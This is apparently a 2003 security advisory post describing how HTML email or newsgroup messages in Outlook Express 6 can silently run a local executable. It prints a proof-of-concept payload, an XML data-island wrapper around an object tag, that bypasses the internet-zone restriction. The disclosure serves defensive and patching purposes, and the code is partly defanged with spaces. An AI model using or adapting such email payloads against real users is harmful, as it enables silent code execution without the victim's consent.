Saturday, February 22, 2003 Technical silent delivery and installation of an executable no client input other than reading an email or viewing a newsgroup message. Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever. This should not be possible. When viewing an email message or a newsgroup message, Outlook Express creates a temp file in the Internet Explorer cache. From here security should be governed by Internet Explorer's security settings. In an html email with internet zone applied, this will not function: <o bject classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1" code base="C:WINDOWSFTP.EXE"></object> [screen shot: http://www.malware.com/tsktsk.png 11KB] In an html email message or newsgroup message with internet zone applied this will function: <xml id=oExec> <security><exploit> <![CDATA[ <o bject id="oFile" classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1" code base="C:WINDOWSFTP.EXE"></object>]]></exploit></security></xml> <SPAN dataFld=exploit dataFormatAs=html dataSrc=#oExec></SPAN> courtesy of: http://sec.greymagic.com/adv/gm001-ie/ [screen shot: http://www.malware.com/tsktsktsk.png 11KB] NOTE: that default installations of Outlook Express 6.00 are with restricted zone applied. However there still remain many 'happy people' out there that enjoy their html mail messages and html newsgroup messages, and coupling the above with any one of a million other unsolved problems now and in the future with Internet Explorer and Outlook Express, including a new http://www.malware.com/stench.html we are back in business. Notes: This is supposed to be patched: http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March 2002 Keywords: experts Academic Advisory Board Think Tank security concepts -- http://www.malware.com
